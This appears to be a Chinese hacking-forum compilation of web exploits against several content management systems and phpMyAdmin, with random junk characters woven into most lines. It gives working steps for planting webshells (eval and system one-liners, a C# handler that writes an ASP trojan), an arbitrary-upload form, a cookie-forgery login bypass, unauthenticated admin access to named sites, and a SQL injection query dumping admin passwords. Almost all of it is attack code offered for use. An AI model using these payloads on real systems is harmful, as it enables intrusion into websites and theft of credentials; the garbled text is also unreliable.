* o3 M, K; i" w, j, a q# Y如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件6 |) q. Z, @0 `3 E1 u4 j
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">* f1 U* ]: Q3 [# ^5 h# i3 Y6 X
Upload a new file:<br>
" F; S0 x7 C1 q) x* m4 z/ |<input type="file" name="NewFile" size="50"><br>
- q0 [6 Z2 N3 B3 ?3 y7 B. I, E% O<input id="btnUpload" type="submit" value="Upload">
! Q; `( L7 _) C1 [# a/ r</form>$ Q0 H, D# S0 _2 O5 `
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. c+ k, Z2 U# O( Y9 T/ x. F2 ]0 m: H/ k" L
SDcms 后台拿webshell
: x* ]2 |* W( K7 G7 z* Q; O- r& H* i8 f: o) w
第一种方法:
' l2 M" C8 L! P3 Y8 s& r进入后台-->系统管理-->系统设置-->系统设置->网站名称;! U; n. w- m" U
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx; ]$ d5 e, J1 O8 q8 s8 U3 d
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
) D( b( G: e8 j第二种方法:; K7 ^) D6 d' @4 [- f" D
进入后台-->系统管理-->系统设置-->系统设置->上传设置;" p+ q/ n* Q* K* u
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!) t+ R( a4 l. i' u6 l O8 \6 G A
第三种方法:5 W. n4 O0 Y8 z
进入后台-->界面管理-->模板文件管理-->创建文件
+ k1 K Q6 k4 A, l2 [% j! r, h, j文件名写入getshell.ashx) W, Z8 V9 q1 D
内容写入下面内容:
. c+ y# a9 M* `* U! O5 k Q2 o/====================复制下面的=========================/- \6 i/ L% ]0 V1 O& \- T
<%@ WebHandler Language="C#" Class="Handler" %>
+ K9 j, O4 a$ g ?# [using System;3 A% o! C# w! k9 S" k3 w5 O
using System.Web;' W) o- E2 C* v3 E. a& ^& y0 ?
using System.IO;
5 j5 H7 v3 T7 x) S( T6 T/ \5 Lpublic class Handler : IHttpHandler {3 P- g6 t! ]% O1 v2 m2 Z
public void ProcessRequest (HttpContext context) {
, T8 _# C8 ?8 ]) jcontext.Response.ContentType = "text/plain";
' ~8 ^- b! V# e4 K0 D4 iStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));# x' \. [, j3 V2 j- \; L" J
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");4 x2 P) s- J+ S. x0 }. o
file1.Flush();
/ b6 _5 f+ Y7 C: Ofile1.Close();
* j& `# e; [- @) p# e}. L) v, | w* W( \# H5 p2 M
public bool IsReusable {
/ c6 c# y& P9 _7 J+ I+ v! rget {: b a: N3 R. [* t; Z7 Q' o
return false;4 _( u k$ ]% a7 |+ r1 L
} n8 `* Y7 D, i5 B
}; N: f2 H) C; u6 q
}
& ~/ d5 T! p0 q2 b/=============================================/
: ] n: i# h# ?- ~访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
" B4 v( e. Y$ `8 G# ^会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接1 y& l; {& T% L8 P1 s- o- v0 ^
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
F' z3 O9 z% {4 [" g$ r1 }- \7 }) A' S! K' ^
ESCMS网站管理系统0day" \+ R1 q; J6 t
, |& Y, l% l: w' m( ~% q& P后台登陆验证是通过admin/check.asp实现的
5 D( s+ C9 l. e% R4 p' m" s/ f( \- f1 I& K$ ~& J2 l
首先我们打开http://target.com/admin/es_index.html: K" ~9 `* n( K
然后在COOKIE结尾加上& [4 s9 O f, c3 g$ m* Q! f* |) s
; ESCMS$_SP2=ES_admin=st0p;$ D! C0 O. z/ J# J4 T
修改,然后刷新
! f; x- f' p( U# {# C进后台了嘎..
$ H( q3 B4 m& u( |; ~5 I; \' B然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
# q9 y6 z. w' _' P( h6 J V7 l! a0 L
, Y9 K" s2 P, Z- @0 h8 L8 b" O; f利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
' u( w, Q2 T& L' U嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
! }! |1 s, ? w& i$ \存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..7 m5 n1 m; A% S% b0 {
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了, J. y4 v; r. I4 `
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 e+ d3 n5 ~- K5 S$ t8 |2 Y( f
7 V2 n# X6 l4 c8 F1 y
宁志网站管理系统后台无验证漏洞及修复! w% f; l5 }8 }0 r
i9 w. [' x& m6 s
网上搜了一下,好像没有发布.如有雷同纯粹巧合!6 y- V% h0 C8 _) _1 k+ r6 l" Y7 [0 k
官方网站:www.ningzhi.net# {2 d. B* T6 N; a0 ^4 U8 D
学校网站管理系统 V.2011版本 2 T; u/ J5 ?' W4 v3 [" l; O: O
http://down.chinaz.com/soft/29943.htm " g) p; O5 x0 D# x
其它版本(如:政府版等),自行下载.
# e5 V- c( p" u4 N9 a漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~. \: T$ D3 w6 C& ]2 a6 T$ t
login.asp代码如下:
5 ~- e! S) ~2 O" s" C f Q; y4 K<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> ( q$ Y9 v5 q* {, t$ m) i
manage.asp代码我就不帖出来了.反正也没验证.. a6 m: x5 [! f4 i3 u$ m
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
) ^$ w) w3 P+ F漏洞利用:
) r- a' |, V# S直接访问http://www.0855.tv/admin/manage.asp& D0 a* n7 Q, m5 \9 F4 Y7 V
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5. s3 ?- y% x+ O# q9 L; O3 s
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ C6 S) `& K/ q' @) C0 O0 t
/ c/ H/ {4 ]2 [/ ^+ v1 P- Qphpmyadmin拿shell的四种方法总结及修复
6 e; j# o7 O. Y
W( O0 W& z5 ?1 r, g' q方法一:6 [$ }& ]; C( C1 F
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );; e% |1 i% Y; D$ f
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
; O9 j3 O8 s U9 N, m$ ^2 G9 ySELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
( i" h& _2 F0 I4 |* L6 Q----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php( b0 c" g5 n0 k8 G; A$ _) @4 }
一句话连接密码:7on
6 N$ {* R' p3 F方法二:, ~3 Y) m; w( J: t$ l
读取文件内容: select load_file('E:/xamp/www/s.php');
+ `. L+ x! M) ^, j ^+ I3 h写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
- ]+ Z7 y8 F5 n) r. @9 @3 Ocmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'1 B) ]; ~; m3 z. e* E {
方法三:, h( q9 r, t: C9 [" H' i
JhackJ版本 PHPmyadmin拿shell1 o. K. {: S9 V1 E0 F4 f
Create TABLE study (cmd text NOT NULL); @7 R/ X2 A1 P$ \3 n; G, |, s
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
/ M- T4 v) {8 C- E- C8 f% f; I$ Cselect cmd from study into outfile 'E:/wamp/www/7.php';
# E1 k; ?: J ZDrop TABLE IF EXISTS study;
" w+ o, T, _5 g) C6 J<?php eval($_POST[cmd])?>
* `" i# c) X: d; Y* E! D8 P: f7 ?CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
y/ ]4 R$ K! cINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1$ g) ^# g; P1 ^! r/ q- p7 ^
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
5 W8 N+ H- t! }, j ZDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
5 @; ?& u @' n S W! n/ g4 P方法四:% S* q# |& [- I" u# U% D
select load_file('E:/xamp/www/study.php');
) i" a. U+ G/ R& nselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
8 @3 W/ e4 j$ N; E然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
6 I% e* d W. `1 Y. Y-----------------------------------------------------------------------------------------------------------------------------------------------------------------------9 }/ j9 X+ j, ] D; K
. b2 Y$ J6 `0 d; C/ a# I4 K4 D1 h) Q! ENO.001中学网站管理系统 Build 110628 注入漏洞5 n* r4 [2 F. J9 g2 l7 c
4 ?' y: ~* d- Z
NO.001中学网站管理系统功能模块:4 L; H3 `+ P9 w! Q3 X! q2 Z: m
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
3 J R2 z2 m# C ?; Q1 O( E/ J2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
; Y8 O5 s6 o: T/ P* J3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息. }. ?+ r7 V+ z8 `; n
4.视频图片管理:一级分类,动态添加视频或者图片等信息' F/ @; s ?1 v1 e* q/ a% I9 a- j, x
5.留言管理:对留言,修改,删除、回复等管理
; I7 m; E }! } a$ X" [6.校友频道:包括校友资料excel导出、管理等功能
- @+ ^- x8 W8 R7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页$ ?$ s8 l- S( e5 v9 `4 A
默认后台:admin/login.asp
% z* o% K x- x2 v) x" q. Z D3 |官方演示:http://demo.001cms.net
+ ~: N/ ]2 L6 W8 e; M- w- Y* h源码下载地址:http://down.chinaz.com/soft/30187.htm; I# o. o, {& h8 Z
EXP:
" X; d* S% S; xunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
! `2 v! ^" _/ d' x3 k9 n/ F% A测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin4 d' ~) [/ ?0 R1 N/ {
getshell:后台有备份,你懂的- P8 z. X8 t4 ~+ t% o+ L# h
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
! X/ V) K U: f7 i! M" i; H------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |